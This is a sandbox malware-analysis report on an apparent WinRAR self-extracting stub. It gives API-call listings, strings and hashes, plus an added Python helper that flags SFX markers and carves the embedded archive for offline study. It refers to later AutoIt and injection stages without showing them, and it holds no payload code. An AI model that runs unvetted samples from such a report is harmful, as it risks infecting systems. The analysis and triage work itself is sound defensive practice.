                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00E84795
                                                                                              • LoadIconW.USER32(00000000,00000064), ref: 00E847AC
                                                                                              • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_00020900,00000000), ref: 00E84803
                                                                                              • Sleep.KERNELBASE(00001B58), ref: 00E84834
                                                                                              • DeleteObject.GDI32 ref: 00E84858
                                                                                              • DeleteObject.GDI32(0F050EA2), ref: 00E84868
                                                                                                • Part of subcall function 00E614A7: _wcslen.LIBCMT ref: 00E614B8
                                                                                                • Part of subcall function 00E819EE: __EH_prolog3_GS.LIBCMT ref: 00E819F5
                                                                                              • CloseHandle.KERNEL32 ref: 00E848AA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$EnvironmentHandleVariableView$AddressCloseDeleteH_prolog3H_prolog3_ModuleObjectProcUnmap_wcslen$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingOpenParamSleepStartupTime_swprintf
                                                                                              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$0T$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                              • API String ID: 3142445277-4202243839
                                                                                              • Opcode ID: 6a67f898772a1918b5cab4ee8b0487c593ec383cdcc7826e1e4c9c5451f60da9
                                                                                              • Instruction ID: 2c36dc3c57a0cb382cfcdb409373cccb0b73378cb8f071bc252e3e635892120e
                                                                                              • Opcode Fuzzy Hash: 6a67f898772a1918b5cab4ee8b0487c593ec383cdcc7826e1e4c9c5451f60da9
                                                                                              • Instruction Fuzzy Hash: 4C91F3B2504740AFC325FF62EC45BAB77E8EB89704F40552EF54DB2292EB749808CB61
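The routine at 00E8454A above opens the winrarsfxmappingfile.tmp file mapping, exports the sfxcmd, sfxpar, sfxname and sfxstime environment variables and shows the STARTDLG dialog, which is the start-up sequence of a WinRAR self-extracting (SFX) module rather than of the payload itself. The triage helper below is an added example, not part of the Joe Sandbox report and not WinRAR's own code: it uses exactly those strings as markers and carves whatever RAR archive follows the stub. That an archive is appended after the stub is an assumption about SFX layout, the RAR4/RAR5 signatures are the published magic values, and the sample blob is constructed for the demonstration.

```python
"""Flag a PE as a WinRAR SFX stub and carve the appended RAR archive.

Added triage example. Marker strings are the ones the sandbox report lists for
the stub's main routine; the RAR signatures are the published magic values; the
demo blob is constructed here and is not the analysed sample.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Strings the report shows the SFX stub using: file mapping name, environment
# variables it exports, and the dialog resource id it shows.
SFX_MARKERS = (
    "winrarsfxmappingfile.tmp",
    "sfxcmd", "sfxpar", "sfxname", "sfxstime",
    "STARTDLG",
)
# RAR archive signatures: v1.5-4.x and v5 (published magic values).
RAR4_SIG = b"Rar!\x1a\x07\x00"
RAR5_SIG = b"Rar!\x1a\x07\x01\x00"


@dataclass
class SfxTriage:
    markers: Dict[str, List[int]]     # marker string -> offsets in the image
    rar_offset: Optional[int]         # start of the first RAR signature, if any
    rar_version: Optional[str]        # "RAR4" / "RAR5"
    archive: bytes                    # carved bytes from the signature onward

    @property
    def is_sfx(self) -> bool:
        # Several stub markers plus an appended archive: treat as a WinRAR SFX.
        return len(self.markers) >= 3 and self.rar_offset is not None


def find_markers(data: bytes) -> Dict[str, List[int]]:
    """Locate every marker in both ASCII and UTF-16LE form.

    The stub hands these strings to the W-suffixed APIs, so in the image they
    are normally UTF-16LE; the ASCII search covers other builds and dumps.
    """
    found: Dict[str, List[int]] = {}
    for marker in SFX_MARKERS:
        offsets: List[int] = []
        for enc in ("ascii", "utf-16-le"):
            pat = re.escape(marker.encode(enc))
            offsets += [m.start() for m in re.finditer(pat, data)]
        if offsets:
            found[marker] = sorted(offsets)
    return found


def find_rar(data: bytes) -> Tuple[Optional[int], Optional[str]]:
    """Return (offset, version) of the first RAR signature, or (None, None)."""
    hits = [(data.find(sig), ver) for sig, ver in ((RAR5_SIG, "RAR5"), (RAR4_SIG, "RAR4"))]
    hits = [h for h in hits if h[0] >= 0]
    return min(hits) if hits else (None, None)


def triage(data: bytes) -> SfxTriage:
    """Run both checks and carve the archive from the first signature onward."""
    markers = find_markers(data)
    offset, version = find_rar(data)
    archive = data[offset:] if offset is not None else b""
    return SfxTriage(markers, offset, version, archive)


def build_demo_blob() -> bytes:
    """Constructed stand-in for a stub image: a fake header, the stub's strings
    in UTF-16LE with terminators, then a RAR5 signature and a dummy payload."""
    stub = b"MZ" + b"\x00" * 62
    for s in SFX_MARKERS:
        stub += s.encode("utf-16-le") + b"\x00\x00"
    stub += b"\x00" * 16
    return stub + RAR5_SIG + b"\x01\x02\x03payload"


if __name__ == "__main__":
    r = triage(build_demo_blob())
    print("SFX stub:", r.is_sfx, "| markers:", sorted(r.markers),
          "| archive at:", r.rar_offset, r.rar_version, "|", len(r.archive), "bytes")
```

On a real sample call triage(open(path, "rb").read()); three or more markers together with a RAR signature is the cue to carve the archive and unpack it offline, so the stages the rest of this report flags (the AutoIt script and what it injects) can be examined without running the stub. A RAR signature alone is not enough: any PE that embeds an archive as a resource would match that half of the check.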

                                                                                              Control-flow Graph: function at 00E7EBD3 (basic blocks 00E7EBD3-00E7ECF2; legend: Executed / Not Executed). API calls along the path: FindResourceW, SizeofResource, LoadResource, LockResource, GlobalAlloc, GlobalLock, CreateStreamOnHGlobal, GdipCreateHBITMAPFromBitmap, GlobalUnlock, GlobalFree.
                                                                                              APIs
                                                                                              • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00E80845,00000066), ref: 00E7EBE6
                                                                                              • SizeofResource.KERNEL32(00000000,?,?,?,00E80845,00000066), ref: 00E7EBFD
                                                                                              • LoadResource.KERNEL32(00000000,?,?,?,00E80845,00000066), ref: 00E7EC14
                                                                                              • LockResource.KERNEL32(00000000,?,?,?,00E80845,00000066), ref: 00E7EC23
                                                                                              • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00E80845,00000066), ref: 00E7EC3E
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00E7EC4F
                                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00E7EC73
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00E7ECD7
                                                                                                • Part of subcall function 00E7EB06: GdipAlloc.GDIPLUS(00000010), ref: 00E7EB0C
                                                                                              • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00E7ECB8
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00E7ECDE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                              • String ID: PNG
                                                                                              • API String ID: 211097158-364855578
                                                                                              • Opcode ID: a15016e0dae747742181ecd4bbf7b363d3a0f94c74a96856fc1872dad51620fc
                                                                                              • Instruction ID: 3864dacb9bb98bc4ede8ffe09cd040efb4104990cf88d2f933dc80298f3f883c
                                                                                              • Opcode Fuzzy Hash: a15016e0dae747742181ecd4bbf7b363d3a0f94c74a96856fc1872dad51620fc
                                                                                              • Instruction Fuzzy Hash: 24319C75601642AFD721AF62DC48D2BBFACFF89754B14452AF809F2361EB31D805CBA0
                                                                                              APIs
                                                                                                • Part of subcall function 00E78781: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,522FB702,00000007,?,?,?,00E78751,?,?,?,?,0000000C,00E64426), ref: 00E7879D
                                                                                              • _wcslen.LIBCMT ref: 00E7395A
                                                                                              • __fprintf_l.LIBCMT ref: 00E73AA7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide__fprintf_l_wcslen
                                                                                              • String ID: ,$$%s:$*messages***$*messages***$@%s:$RTL
                                                                                              • API String ID: 1796436225-285229759
                                                                                              • Opcode ID: 7a594adc03c6931e61adbdf60e69ea7905b20c6f6b3e31cee16a8741dc046dff
                                                                                              • Instruction ID: e3004c5740bd1b2d6dc10fa1d10e6429364e13c3b23adc0645b1a500d50436ca
                                                                                              • Opcode Fuzzy Hash: 7a594adc03c6931e61adbdf60e69ea7905b20c6f6b3e31cee16a8741dc046dff
                                                                                              • Instruction Fuzzy Hash: 8352D571900249ABDF64EFB4CC45AEEB7B5FF44304F10952AE50DBB281EB719A44DB60

                                                                                              Control-flow Graph: function at 00E6F826 (basic blocks 00E6F826-00E6FA0A; legend: Executed / Not Executed). API calls along the path: FindFirstFileW, FindNextFileW, GetLastError.
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00E6F830
                                                                                              • FindFirstFileW.KERNELBASE(?,?,00000274,00E6F733,000000FF,00000049,00000049,?,?,00E6A684,?,?,00000000,?,?,?), ref: 00E6F859
                                                                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,00E6D303,?,?,?,?,?,?,?,522FB702,00000049), ref: 00E6F8A4
                                                                                              • GetLastError.KERNEL32(?,?,?,00E6D303,?,?,?,?,?,?,?,522FB702,00000049,?,00000000), ref: 00E6F902
                                                                                              • FindNextFileW.KERNEL32(?,?,00000274,00E6F733,000000FF,00000049,00000049,?,?,00E6A684,?,?,00000000,?,?,?), ref: 00E6F92D
                                                                                              • GetLastError.KERNEL32(?,00E6D303,?,?,?,?,?,?,?,522FB702,00000049,?,00000000), ref: 00E6F93A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$ErrorFirstLast$H_prolog3_Next
                                                                                              • String ID:
                                                                                              • API String ID: 3831798110-0
                                                                                              • Opcode ID: 89d81960ae02b656af61afc05a16b76a228ee6d51e21c69b578ef69a2cef833f
                                                                                              • Instruction ID: 189771cc6ee7b846b8a9e3e77abba7fb8f01a9f42f874c059443fb490414ae57
                                                                                              • Opcode Fuzzy Hash: 89d81960ae02b656af61afc05a16b76a228ee6d51e21c69b578ef69a2cef833f
                                                                                              • Instruction Fuzzy Hash: FC515171904619DFCF14DFA4E888AEDB7B5BF49360F1052AAE419F3290DB31AA84CF50
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00E6C342
                                                                                                • Part of subcall function 00E72095: __EH_prolog3_GS.LIBCMT ref: 00E7209C
                                                                                                • Part of subcall function 00E657C0: __EH_prolog3.LIBCMT ref: 00E657C7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3H_prolog3__wcslen
                                                                                              • String ID: __tmp_reference_source_
                                                                                              • API String ID: 1523997010-685763994
                                                                                              • Opcode ID: 69aa2f4c1f4b245ad5d68afe6652e409739819c46f77a6b57fca461246592d69
                                                                                              • Instruction ID: 57a7ab15e64234876800d0ac8d3a553f30392e6ada27aa71ac0eef24867b447e
                                                                                              • Opcode Fuzzy Hash: 69aa2f4c1f4b245ad5d68afe6652e409739819c46f77a6b57fca461246592d69
                                                                                              • Instruction Fuzzy Hash: 2BD2E370A842899FDB25DFB4D890BFEBBF4BF05348F14511AE49AB7241DB30A949CB50
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00000000,?,00E8EC80,00000000,00EA6F40,0000000C,00E8EDD7,00000000,00000002,00000000), ref: 00E8ECCB
                                                                                              • TerminateProcess.KERNEL32(00000000,?,00E8EC80,00000000,00EA6F40,0000000C,00E8EDD7,00000000,00000002,00000000), ref: 00E8ECD2
                                                                                              • ExitProcess.KERNEL32 ref: 00E8ECE4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                              • String ID:
                                                                                              • API String ID: 1703294689-0
                                                                                              • Opcode ID: bdc7206f285f6183f1ed7c7f6a854d45cebf1488a15f4025d4f920645de522b9
                                                                                              • Instruction ID: 35ae3e5f1ecd8a1bed607b5d409aebe4122b78a5590da6f087c341c5e2c051aa
                                                                                              • Opcode Fuzzy Hash: bdc7206f285f6183f1ed7c7f6a854d45cebf1488a15f4025d4f920645de522b9
                                                                                              • Instruction Fuzzy Hash: 98E04632000248AFCF127F62CE08A587B69EF00386F502426F84CBA222CB36EC46CB50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID:
                                                                                              • API String ID: 431132790-0
                                                                                              • Opcode ID: a3c52e67136d008093f832026e3d2b5b2f06661177f18bed847ac890ce08ad96
                                                                                              • Instruction ID: d6ca4f137caf6ad724e247b29b01ceaba23b4a33e574cd3d541918935d120339
                                                                                              • Opcode Fuzzy Hash: a3c52e67136d008093f832026e3d2b5b2f06661177f18bed847ac890ce08ad96
                                                                                              • Instruction Fuzzy Hash: 2BE1A1715083448FDB24DF28C884B5BBBE5BF88308F08956DE99DAB346D734E945CB92
                                                                                              APIs
                                                                                              • __EH_prolog3_catch_GS.LIBCMT ref: 00E8090A
                                                                                                • Part of subcall function 00E61E44: GetDlgItem.USER32(00000000,00003021), ref: 00E61E88
                                                                                                • Part of subcall function 00E61E44: SetWindowTextW.USER32(00000000,00E9C6C8), ref: 00E61E9E
                                                                                              • EndDialog.USER32(?,00000000), ref: 00E80A18
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00E80A57
                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E80A71
                                                                                              • IsDialogMessageW.USER32(?,?), ref: 00E80A84
                                                                                              • TranslateMessage.USER32(?), ref: 00E80A92
                                                                                              • DispatchMessageW.USER32(?), ref: 00E80A9C
                                                                                              • EndDialog.USER32(?,00000001), ref: 00E80ADE
                                                                                              • GetDlgItem.USER32(?,00000068), ref: 00E80B04
                                                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00E80B1F
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,00E9C6C8), ref: 00E80B32
                                                                                              • SetFocus.USER32(00000000), ref: 00E80B39
                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00E80C20
                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00E80C4C
                                                                                              • GetTickCount.KERNEL32 ref: 00E80C79
                                                                                              • GetLastError.KERNEL32(?,00000011), ref: 00E80CD5
                                                                                              • GetCommandLineW.KERNEL32 ref: 00E80DF9
                                                                                              • _wcslen.LIBCMT ref: 00E80E06
                                                                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,?,winrarsfxmappingfile.tmp,?,00EB5430,00000400,00000001,00000001), ref: 00E80E85
                                                                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 00E80EA3
                                                                                              • ShellExecuteExW.SHELL32(0000003C), ref: 00E80EDC
                                                                                              • WaitForInputIdle.USER32(?,00002710), ref: 00E80F0B
                                                                                              • Sleep.KERNEL32(00000064), ref: 00E80F25
                                                                                              • UnmapViewOfFile.KERNEL32(?,?,?,?,?,?,?,00EB5430,00000400), ref: 00E80F61
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00EB5430,00000400), ref: 00E80F6D
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00E81072
                                                                                                • Part of subcall function 00E61E1F: GetDlgItem.USER32(?,?), ref: 00E61E34
                                                                                                • Part of subcall function 00E61E1F: ShowWindow.USER32(00000000), ref: 00E61E3B
                                                                                              • SetDlgItemTextW.USER32(?,00000065,00E9C6C8), ref: 00E8108A
                                                                                              • GetDlgItem.USER32(?,00000065), ref: 00E81093
                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00E810A2
                                                                                              • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_000206D0,00000000,?), ref: 00E81422
                                                                                              • EndDialog.USER32(?,00000001), ref: 00E81436
                                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00E810B1
                                                                                                • Part of subcall function 00E7E265: __EH_prolog3_GS.LIBCMT ref: 00E7E26C
                                                                                                • Part of subcall function 00E7E265: ShowWindow.USER32(?,00000000,00000038), ref: 00E7E294
                                                                                                • Part of subcall function 00E7E265: GetWindowRect.USER32(?,?), ref: 00E7E2D8
                                                                                                • Part of subcall function 00E7E265: ShowWindow.USER32(?,00000005,?,00000000), ref: 00E7E373
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00E8114F
                                                                                              • SendMessageW.USER32(?,00000080,00000001,0001042F), ref: 00E81284
                                                                                              • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,0F050EA2), ref: 00E8129D
                                                                                              • GetDlgItem.USER32(?,00000068), ref: 00E812A6
                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00E812BE
                                                                                              • GetDlgItem.USER32(?,00000066), ref: 00E812E6
                                                                                              • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00E8135D
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00E81371
                                                                                              • EnableWindow.USER32(?,00000000), ref: 00E815A7
                                                                                              • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00E815E8
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00E8160D
                                                                                                • Part of subcall function 00E81D4F: __EH_prolog3_GS.LIBCMT ref: 00E81D59
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: Item$Message$TextWindow$Send$Dialog$ErrorFileLastShow$H_prolog3_LongView$CloseCommandCountCreateDispatchEnableExecuteFocusH_prolog3_catch_HandleIdleInputLineMappingParamRectShellSleepTickTranslateUnmapWait_wcslen
                                                                                              • String ID: -el -s2 "-d%s" "-sp%s"$<$@$@S$LICENSEDLG$STARTDLG$\S$__tmp_rar_sfx_access_check_$winrarsfxmappingfile.tmp$J
                                                                                              • API String ID: 3616063595-3051872833
                                                                                              • Opcode ID: adf4651aaef639d0f4834392abe7691a251a8dd020167f524058aca4f236a198
                                                                                              • Instruction ID: f6cbbde140a3e57e056b23b3bdce370fc57ac3383fc007742d208c07075b7cbf
                                                                                              • Opcode Fuzzy Hash: adf4651aaef639d0f4834392abe7691a251a8dd020167f524058aca4f236a198
                                                                                              • Instruction Fuzzy Hash: 7E72D271944348AEEB21FBB4DC4AFEE7BB8AB01344F045199F10DB7292D7B44A49CB21

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 470 e76d7b-e76dd1 call e85b20 GetModuleHandleW 473 e76dd3-e76de3 GetProcAddress 470->473 474 e76e28-e7708c 470->474 477 e76de5-e76dfb 473->477 478 e76dfd-e76e0d GetProcAddress 473->478 475 e77092-e7709d call e8e50e 474->475 476 e7719b 474->476 475->476 487 e770a3-e770b8 call e713f9 475->487 479 e7719d-e771be call e713f9 call e72117 476->479 477->478 478->474 481 e76e0f-e76e24 478->481 493 e771c0-e771cc call e7067e 479->493 481->474 494 e770bd-e770d5 CreateFileW 487->494 495 e770ba 487->495 502 e77203-e77234 call e614a7 call e7229d call e61a66 call e6ed1f 493->502 503 e771ce-e771dc call e76c5e 493->503 497 e77186-e77199 CloseHandle call e61a66 494->497 498 e770db-e770e7 SetFilePointer 494->498 495->494 497->479 498->497 500 e770ed-e77107 ReadFile 498->500 500->497 504 e77109-e77114 500->504 534 e77239-e7723c 502->534 503->502 517 e771de-e77201 CompareStringW 503->517 508 e773f2-e773f7 call e85ce1 504->508 509 e7711a-e7714d call e614a7 504->509 519 e77161-e77174 call e76366 509->519 517->502 520 e7723e-e77242 517->520 528 e77176-e77181 call e61a66 * 2 519->528 529 e7714f-e77156 519->529 520->493 523 e77248 520->523 526 e7724c-e77250 523->526 530 e77296-e77298 526->530 531 e77252 526->531 528->497 532 e7715b-e7715c call e76c5e 529->532 533 e77158 529->533 535 e7729e-e772b1 call e72187 call e7067e 530->535 536 e773bd-e773ef call e61a66 * 2 call e85734 530->536 538 e77254-e7728a call e614a7 call e7229d call e61a66 call e6ed1f 531->538 532->519 533->532 534->520 540 e7724a 534->540 556 e772b3-e77330 call e76c5e * 2 call e74318 call e76a25 call e74318 call e614a7 call e7ecf5 call e61549 535->556 557 e77332-e77366 call e76a25 AllocConsole 535->557 572 e77294 538->572 573 e7728c-e77290 538->573 540->526 574 e773b0-e773b7 call e61549 ExitProcess 556->574 567 e773ad 557->567 568 e77368-e773a7 GetCurrentProcessId AttachConsole call e77441 call e77436 GetStdHandle WriteConsoleW Sleep FreeConsole 557->568 567->574 568->567 572->530 573->538 577 e77292 573->577 577->530
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32,522FB702), ref: 00E76DC7
                                                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00E76DD9
                                                                                              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00E76E03
                                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E770CA
                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E770DF
                                                                                              • ReadFile.KERNEL32(00000000,?,00007FFE,?,00000000), ref: 00E770FF
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00E77187
                                                                                              • CompareStringW.KERNEL32(00000400,00001001,?,000000FF,DXGIDebug.dll,000000FF,?,?,?), ref: 00E771F8
                                                                                              • AllocConsole.KERNEL32 ref: 00E7735E
                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00E77368
                                                                                              • AttachConsole.KERNEL32(00000000), ref: 00E7736F
                                                                                              • GetStdHandle.KERNEL32(000000F4,00000000,00000000,?,00000000), ref: 00E7738F
                                                                                              • WriteConsoleW.KERNEL32(00000000), ref: 00E77396
                                                                                              • Sleep.KERNEL32(00002710), ref: 00E773A1
                                                                                              • FreeConsole.KERNEL32 ref: 00E773A7
                                                                                              • ExitProcess.KERNEL32 ref: 00E773B7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentExitFreeModulePointerReadSleepStringWrite
                                                                                              • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                                                              • API String ID: 2644799563-3298887752
                                                                                              • Opcode ID: 51eefe04c4d0c100f0b171c15a2c2b56c8d4a83552d4f3262a91cf226f33a2ab
